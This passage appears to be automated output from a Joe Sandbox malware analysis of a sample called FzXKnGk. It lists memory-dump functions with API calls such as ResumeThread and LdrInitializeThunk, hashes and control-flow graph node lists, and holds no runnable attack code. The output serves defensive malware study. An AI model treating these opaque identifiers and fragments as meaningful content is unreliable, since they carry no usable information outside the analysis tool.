                                                                                                                                                    • Source File: 00000007.00000002.1756807740.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_2940000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFromIconResource
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3668623891-0
                                                                                                                                                    • Opcode ID: 35240c3eb84f68e385cc245549fbf39a27a220aef6cccc0b70a3fa4c35950ff0
                                                                                                                                                    • Instruction ID: ea755a9e231461aed454f1561cb93ca9d21f52a6994046c467d3663c34f81ee0
                                                                                                                                                    • Opcode Fuzzy Hash: 35240c3eb84f68e385cc245549fbf39a27a220aef6cccc0b70a3fa4c35950ff0
                                                                                                                                                    • Instruction Fuzzy Hash: 8B2147B5800259DFDB10DF9AD844AEEBFF8EF48324F14845AE554A7260C375A984CFA4
                                                                                                                                                    Function 00DBB073 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00DBB0E5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    • Opcode ID: e4d660848a16e83a6abd289a922e9245ecba3011179362c65586ed283d68000a
                                                                                                                                                    • Instruction ID: e9fd4c457c5bb0c5e7c7d1e7568be45bcf603b3ae38dec61c1fc55ad4df9b682
                                                                                                                                                    • Opcode Fuzzy Hash: e4d660848a16e83a6abd289a922e9245ecba3011179362c65586ed283d68000a
                                                                                                                                                    • Instruction Fuzzy Hash: E521A971805788CECB10DFA9D8043EABFF4AF1A324F1480AAD49AA7352C3795A45CB71
                                                                                                                                                    Function 02948104 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,02948FA2,?,?,?,?,?), ref: 02949047
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1756807740.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_2940000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFromIconResource
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3668623891-0
                                                                                                                                                    • Opcode ID: d1cfcefaa39516fba2e9c5cef07109815f6725b4748c550da15be1e27fd59e87
                                                                                                                                                    • Instruction ID: 61357edb0b87fa97665ef11a1a928ae6c7112300db54ce9e09e048778c37651b
                                                                                                                                                    • Opcode Fuzzy Hash: d1cfcefaa39516fba2e9c5cef07109815f6725b4748c550da15be1e27fd59e87
                                                                                                                                                    • Instruction Fuzzy Hash: 0D1156B5900249DFDB20CF9AD844BEFBFF8EB48320F14845AEA54A7250C375A954CFA4
                                                                                                                                                    Function 06EEFC38 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1761285331.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_6ee0000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                    • Opcode ID: 759acf0c910c0f08e15b9eb240dd65c6c3eb37a0f646ffe0dd0089456c845a00
                                                                                                                                                    • Instruction ID: a369f770bdf565675931dfd90c5ff276f511a0a9f7644baa405f220113d8431d
                                                                                                                                                    • Opcode Fuzzy Hash: 759acf0c910c0f08e15b9eb240dd65c6c3eb37a0f646ffe0dd0089456c845a00
                                                                                                                                                    • Instruction Fuzzy Hash: 5A1158B5D003488FCB10DFAAD4457EEFFF4AF88324F24842AC459A7250C675A545CBA4
                                                                                                                                                    Function 06EEFC40 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1761285331.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_6ee0000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                    • Opcode ID: bb567a6f4932c58d095d2f0fe7d3ea28e930e2a28dbd77519a959e51773ad2df
                                                                                                                                                    • Instruction ID: 86f58c598bb16cf62d721072e7a0ed23f921ae1662ee385be713f6ca807f9568
                                                                                                                                                    • Opcode Fuzzy Hash: bb567a6f4932c58d095d2f0fe7d3ea28e930e2a28dbd77519a959e51773ad2df
                                                                                                                                                    • Instruction Fuzzy Hash: D51125B5D003488BCB20DFAAC5457EEFBF4AF88324F20842AD559A7250CA75A944CBA4
                                                                                                                                                    Function 00DBC760 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00DBC7C6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    • Opcode ID: 94b7edecc3263517367e06f4c56a9b25570dc53a3d18b42ac0dee69bc6b08927
                                                                                                                                                    • Instruction ID: 1c53870d97760568f32be81537fd7c9a58ad1cb6d80cbf821bc10c0d0a36d9d9
                                                                                                                                                    • Opcode Fuzzy Hash: 94b7edecc3263517367e06f4c56a9b25570dc53a3d18b42ac0dee69bc6b08927
                                                                                                                                                    • Instruction Fuzzy Hash: C1110FB6C00249CFCB10CF9AD444ADEFBF8AF88324F14846AD859A7610C775A545CFA1
                                                                                                                                                    Function 00B6D1FC Relevance: .1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755105355.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_b6d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fd3f5b7f3ebd8e1374c75dec76534e2fa0e6cfb6e304b0954bf0d7c831f04bd3
                                                                                                                                                    • Instruction ID: a18b34f427d5a0dbeac3829257ac06cf52f650510ccc7ae097edb8da1ba61ce4
                                                                                                                                                    • Opcode Fuzzy Hash: fd3f5b7f3ebd8e1374c75dec76534e2fa0e6cfb6e304b0954bf0d7c831f04bd3
                                                                                                                                                    • Instruction Fuzzy Hash: B1212871A04200DFCB05DF14D9D4B2BBFA5FB88314F24C6A9ED050B256C33AD856CBA1
                                                                                                                                                    Function 00B6D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755105355.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_b6d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 77c3be09d9f9d85b4a86b73e00f0ff8fab8c145a1ed0626071af9a3d46491de6
                                                                                                                                                    • Instruction ID: 45e52e9ad2d9d8c8832370b5fbab81c3860c8f8dd83ba42112ec47e52fe05ffa
                                                                                                                                                    • Opcode Fuzzy Hash: 77c3be09d9f9d85b4a86b73e00f0ff8fab8c145a1ed0626071af9a3d46491de6
                                                                                                                                                    • Instruction Fuzzy Hash: 57213A71A00240DFDB05DF14D9C0F27BFA5FBA8318F24C5A9D90A4B656C33AD856C7A1
                                                                                                                                                    Function 00B7D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755180971.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_b7d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f6129b5f0e7846edc207f5b7fff331cc26b003ac434ed4bb20c753088b20f6f7
                                                                                                                                                    • Instruction ID: f12d98b13036cae271ea01097133a522c4cf65f18a83803dd0f0055a4f1f6794
                                                                                                                                                    • Opcode Fuzzy Hash: f6129b5f0e7846edc207f5b7fff331cc26b003ac434ed4bb20c753088b20f6f7
                                                                                                                                                    • Instruction Fuzzy Hash: BA21DE71604200EFDB05DF14DAC0B26BBB5FF88354F24C6ADE95E5B296C33AD846CA61
                                                                                                                                                    Function 00B7D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755180971.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_b7d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5a70a90b419e2040094592f9fabf4e2e31e3fc1bd17fcde73150b253cda88e74
                                                                                                                                                    • Instruction ID: b78f153ab42f09a5988fe84574d8018e1957be498cd11fa86bc777d7c41c4f42
                                                                                                                                                    • Opcode Fuzzy Hash: 5a70a90b419e2040094592f9fabf4e2e31e3fc1bd17fcde73150b253cda88e74
                                                                                                                                                    • Instruction Fuzzy Hash: 4A21FF75604200DFCB14DF24D9D4B26BBB5EF88354F24C6ADE81E4B296C33AD847CA61
                                                                                                                                                    Function 00B7D006 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755180971.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_b7d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e34bae87a81065c860780fb4b238552049ab9bfcc9c561bb45d0308d4a521bd6
                                                                                                                                                    • Instruction ID: e0866d7e361e9dacc0357a2d5e1a33556034328d73ae2bbb19d97560d4642b49
                                                                                                                                                    • Opcode Fuzzy Hash: e34bae87a81065c860780fb4b238552049ab9bfcc9c561bb45d0308d4a521bd6
                                                                                                                                                    • Instruction Fuzzy Hash: AA2162755083809FDB02CF14D994B15BFB1EF56314F28C5DAD8498F2A7C33A985ACB62
                                                                                                                                                    Function 00B6D1F7 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755105355.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_b6d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                                                                                    • Instruction ID: f25a1d535cae568abd5238d8e73a4a17b0bf7dce26fdb0eb6eedc912c162f1f4
                                                                                                                                                    • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                                                                                    • Instruction Fuzzy Hash: 4D21CD76904240CFCB06CF00D9C4B16BFA2FB84314F24C2A9DC080A256C33AD82ACBA1
                                                                                                                                                    Function 00B6D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755105355.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_b6d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction ID: a3c197a92498d1e3d04050ee2b29a5036dca18edb75197380e939a8679be06bb
                                                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction Fuzzy Hash: 8411D676904280CFCB15CF14D5C4B16BFB1FBA4314F24C5AAD9450B656C33AD456CB91
                                                                                                                                                    Function 00B7D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755180971.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_b7d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction ID: 9dfc53ed878357093b1ec5124443be2e0bb1a842c6d50a2afe7ef01a1b30c0cf
                                                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction Fuzzy Hash: 53117975504280DFDB16CF14D5C4B15BBB1FB84314F28C6AAD8494B696C33AD84ACB61

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:19.4%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:16
                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                    execution_graph 18813 183e018 18814 183e024 18813->18814 18817 6f62968 18814->18817 18815 183e0c3 18818 6f6298a 18817->18818 18819 6f62a56 18818->18819 18822 6f6992c 18818->18822 18826 6f69548 18818->18826 18819->18815 18823 6f697e3 18822->18823 18824 6f69a69 LdrInitializeThunk 18823->18824 18825 6f69a81 18824->18825 18825->18819 18827 6f6957e LdrInitializeThunk 18826->18827 18828 6f69579 18826->18828 18831 6f69619 18827->18831 18828->18827 18829 6f696d9 18829->18819 18830 6f69a69 LdrInitializeThunk 18830->18829 18831->18829 18831->18830

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 01839DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                                                                                    • API String ID: 0-183542557
                                                                                                                                                    • Opcode ID: bc6f2d7887f457c7967f58e15a1d5f8dd67e6708da11b35ae79b5122606ce646
                                                                                                                                                    • Instruction ID: 2020121392d32415ac2269d96a6ffc4d18f94bf4a0a89d396758a71050f276a3
                                                                                                                                                    • Opcode Fuzzy Hash: bc6f2d7887f457c7967f58e15a1d5f8dd67e6708da11b35ae79b5122606ce646
                                                                                                                                                    • Instruction Fuzzy Hash: 11A29031A00209CFCB19CFA8C584AAEBBF6FF88310F198569E545DB265D735EE41CB91
                                                                                                                                                    Function 01836FC8 Relevance: 5.4, Strings: 4, Instructions: 447COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 587 1836fc8-1836ffe 588 1837006-183700c 587->588 713 1837000 call 18369a0 587->713 714 1837000 call 1837118 587->714 715 1837000 call 1836fc8 587->715 589 183700e-1837012 588->589 590 183705c-1837060 588->590 593 1837021-1837028 589->593 594 1837014-1837019 589->594 591 1837062-1837071 590->591 592 1837077-183708b 590->592 595 1837073-1837075 591->595 596 183709d-18370a7 591->596 597 1837093-183709a 592->597 716 183708d call 1839dd0 592->716 717 183708d call 1839de0 592->717 718 183708d call 183a0e8 592->718 598 18370fe-183713b 593->598 599 183702e-1837035 593->599 594->593 595->597 600 18370b1-18370b5 596->600 601 18370a9-18370af 596->601 609 1837146-1837166 598->609 610 183713d-1837143 598->610 599->590 602 1837037-183703b 599->602 605 18370bd-18370f7 600->605 607 18370b7 600->607 601->605 603 183704a-1837051 602->603 604 183703d-1837042 602->604 603->598 608 1837057-183705a 603->608 604->603 605->598 607->605 608->597 616 1837168 609->616 617 183716d-1837174 609->617 610->609 619 18374fc-1837505 616->619 618 1837176-1837181 617->618 620 1837187-183719a 618->620 621 183750d-1837519 618->621 626 18371b0-18371cb 620->626 627 183719c-18371aa 620->627 628 183751b-1837521 621->628 629 183749e-18374a4 621->629 639 18371ef-18371f2 626->639 640 18371cd-18371d3 626->640 627->626 638 1837484-183748b 627->638 630 18374a6-18374ab 628->630 631 1837523-1837536 628->631 629->621 629->630 632 18374f0-18374f3 630->632 633 18374ad-18374b2 630->633 637 1837508 632->637 641 18374f5-18374fa 632->641 636 18374b4 633->636 633->637 645 18374bb-18374c0 636->645 637->621 638->619 642 183748d-183748f 638->642 643 18371f8-18371fb 639->643 644 183734c-1837352 639->644 646 18371d5 640->646 647 18371dc-18371df 640->647 641->619 641->642 642->629 654 1837491-1837496 642->654 643->644 650 1837201-1837207 643->650 648 1837358-183735d 644->648 649 183743e-1837441 644->649 651 18374e2-18374e4 645->651 652 18374c2-18374c4 645->652 646->644 646->647 646->649 653 1837212-1837218 646->653 647->653 655 18371e1-18371e4 647->655 648->649 649->637 657 1837447-183744d 649->657 650->644 656 183720d 650->656 651->637 662 18374e6-18374e9 651->662 660 18374d3-18374d9 652->660 661 18374c6-18374cb 652->661 658 183721a-183721c 653->658 659 183721e-1837220 653->659 654->629 663 18371ea 655->663 664 183727e-1837284 655->664 656->649 666 1837472-1837476 657->666 667 183744f-1837457 657->667 668 183722a-1837233 658->668 659->668 660->621 669 18374db-18374e0 660->669 661->660 662->632 663->649 664->649 665 183728a-1837290 664->665 670 1837292-1837294 665->670 671 1837296-1837298 665->671 666->638 675 1837478-183747e 666->675 667->621 672 183745d-183746c 667->672 673 1837246-183726e 668->673 674 1837235-1837240 668->674 669->651 676 18374b6-18374b9 669->676 677 18372a2-18372b9 670->677 671->677 672->626 672->666 688 1837362-1837398 673->688 689 1837274-1837279 673->689 674->649 674->673 675->618 675->638 676->637 676->645 683 18372e4-183730b 677->683 684 18372bb-18372d4 677->684 683->637 694 1837311-1837314 683->694 684->688 692 18372da-18372df 684->692 695 18373a5-18373ad 688->695 696 183739a-183739e 688->696 689->688 692->688 694->637 697 183731a-1837343 694->697 695->637 700 18373b3-18373b8 695->700 698 18373a0-18373a3 696->698 699 18373bd-18373c1 696->699 697->688 712 1837345-183734a 697->712 698->695 698->699 701 18373c3-18373c9 699->701 702 18373e0-18373e4 699->702 700->649 701->702 704 18373cb-18373d3 701->704 705 18373e6-18373ec 702->705 706 18373ee-183740d call 18376f1 702->706 704->637 707 18373d9-18373de 704->707 705->706 709 1837413-1837417 705->709 706->709 707->649 709->649 710 1837419-1837435 709->710 710->649 712->688 713->588 714->588 715->588 716->597 717->597 718->597
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (o^q$(o^q$,bq$,bq
                                                                                                                                                    • API String ID: 0-879173519
                                                                                                                                                    • Opcode ID: cda97ea93c88b8d2a275303a3b3ba1038c2c2090f070d7439a4c9d78dac276ea
                                                                                                                                                    • Instruction ID: d79cf746a02be6ea2929d23454d96297802c9702b8321619194ce07e8c0b7cd3
                                                                                                                                                    • Opcode Fuzzy Hash: cda97ea93c88b8d2a275303a3b3ba1038c2c2090f070d7439a4c9d78dac276ea
                                                                                                                                                    • Instruction Fuzzy Hash: A5024FB1A00219DFDB15CF68C884AADBBB6FF88304F598465E905EB261D734EE41CF91
                                                                                                                                                    Function 06F69548 Relevance: 3.4, APIs: 2, Instructions: 357libraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1780 6f69548-6f69577 1781 6f6957e-6f69614 LdrInitializeThunk 1780->1781 1782 6f69579 1780->1782 1783 6f696b3-6f696b9 1781->1783 1782->1781 1784 6f696bf-6f696d7 1783->1784 1785 6f69619-6f6962c 1783->1785 1786 6f696eb-6f696fe 1784->1786 1787 6f696d9-6f696e6 1784->1787 1788 6f69633-6f69684 1785->1788 1789 6f6962e 1785->1789 1791 6f69705-6f69721 1786->1791 1792 6f69700 1786->1792 1790 6f69a81-6f69b7e 1787->1790 1805 6f69686-6f69694 1788->1805 1806 6f69697-6f696a9 1788->1806 1789->1788 1797 6f69b86-6f69b90 1790->1797 1798 6f69b80-6f69b85 1790->1798 1794 6f69723 1791->1794 1795 6f69728-6f6974c 1791->1795 1792->1791 1794->1795 1801 6f69753-6f69785 1795->1801 1802 6f6974e 1795->1802 1798->1797 1811 6f69787 1801->1811 1812 6f6978c-6f697ce 1801->1812 1802->1801 1805->1784 1808 6f696b0 1806->1808 1809 6f696ab 1806->1809 1808->1783 1809->1808 1811->1812 1814 6f697d5-6f697de 1812->1814 1815 6f697d0 1812->1815 1816 6f69a06-6f69a0c 1814->1816 1815->1814 1817 6f69a12-6f69a25 1816->1817 1818 6f697e3-6f69808 1816->1818 1821 6f69a27 1817->1821 1822 6f69a2c-6f69a47 1817->1822 1819 6f6980f-6f69846 1818->1819 1820 6f6980a 1818->1820 1830 6f6984d-6f6987f 1819->1830 1831 6f69848 1819->1831 1820->1819 1821->1822 1823 6f69a4e-6f69a62 1822->1823 1824 6f69a49 1822->1824 1828 6f69a64 1823->1828 1829 6f69a69-6f69a7f LdrInitializeThunk 1823->1829 1824->1823 1828->1829 1829->1790 1833 6f698e3-6f698f6 1830->1833 1834 6f69881-6f698a6 1830->1834 1831->1830 1837 6f698fd-6f69922 1833->1837 1838 6f698f8 1833->1838 1835 6f698ad-6f698db 1834->1835 1836 6f698a8 1834->1836 1835->1833 1836->1835 1841 6f69924-6f69925 1837->1841 1842 6f69931-6f69969 1837->1842 1838->1837 1841->1817 1843 6f69970-6f699d1 call 6f69328 1842->1843 1844 6f6996b 1842->1844 1850 6f699d3 1843->1850 1851 6f699d8-6f699fc 1843->1851 1844->1843 1850->1851 1854 6f69a03 1851->1854 1855 6f699fe 1851->1855 1854->1816 1855->1854
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2957026234.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_6f60000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 8f373c173e2656d5caba6e5b7b441a0157f1e43f2c911de9c6b4fe0db18c4f73
                                                                                                                                                    • Instruction ID: c06d646a4e68c2d6d207510768ccf4e784f7e87842287ec60d0d0bbc6fd7ec18
                                                                                                                                                    • Opcode Fuzzy Hash: 8f373c173e2656d5caba6e5b7b441a0157f1e43f2c911de9c6b4fe0db18c4f73
                                                                                                                                                    • Instruction Fuzzy Hash: AFF1F174E01219CFDB54CFA9D884B9DBBB2FF88304F5481A9E808AB355DB70A985CF50
                                                                                                                                                    Function 018369A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (o^q$Hbq
                                                                                                                                                    • API String ID: 0-662517225
                                                                                                                                                    • Opcode ID: 0b2a44730d27b0e70c46f1f7a604945c13281981fd76428f2aea044f0ef949c4
                                                                                                                                                    • Instruction ID: ef2d5f7c40d0f50ee0e02eec4407f90669791239dd3dbb8035ba47a996acafd3
                                                                                                                                                    • Opcode Fuzzy Hash: 0b2a44730d27b0e70c46f1f7a604945c13281981fd76428f2aea044f0ef949c4
                                                                                                                                                    • Instruction Fuzzy Hash: E4127B70A002199FDB15DF69C894AAEBBF6FFC8300F248569E505DB395EB349E41CB90
                                                                                                                                                    Function 0183C147 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
